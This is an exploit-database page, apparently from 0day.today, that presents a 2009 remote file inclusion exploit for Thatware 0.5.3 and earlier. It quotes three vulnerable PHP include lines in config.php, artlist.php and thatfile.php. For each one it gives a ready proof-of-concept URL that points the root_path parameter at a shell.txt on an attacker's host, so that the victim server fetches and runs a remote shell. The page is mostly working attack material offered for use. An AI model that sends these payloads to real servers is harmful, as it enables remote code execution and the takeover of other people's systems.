Lucene search

K

Thatware <= 0.5.3 Multiple Remote File Include Exploit

🗓️ 03 Dec 2009 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 10 Views

Thatware vulnerability in multiple files allows remote file inclusion via root_path paramete

Show more
Code
======================================================
Thatware <= 0.5.3 Multiple Remote File Include Exploit
======================================================

########################################################################
#Thatware <= 0.5.3 Multiple Remote File Include Exploit
#Download Script  :  http://sourceforge.net/projects/thatware/files
########################################################################
#
#Vuln : ./thatware_path/config.php (line 4)
#
#      <?php
#        include $root_path."db_settings.php";
#      ?>
#
#PoC  :  http://server/config.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/artlist.php (line 28)
#
#      <?php
#        include $root_path.'thatfile.php';
#      ?>
#
#PoC  :  http://server/artlist.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/thatfile.php (line 130)
#
#      <?php
#        if(file_exists($root_path.'config.php'))
#        include($root_path.'config.php');
#      ?>
#
#PoC  :  http://server/thatfile.php?root_path=http://[attcker]/shell.txt???
#
########################################################################



#  0day.today [2018-04-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
10
.json
Report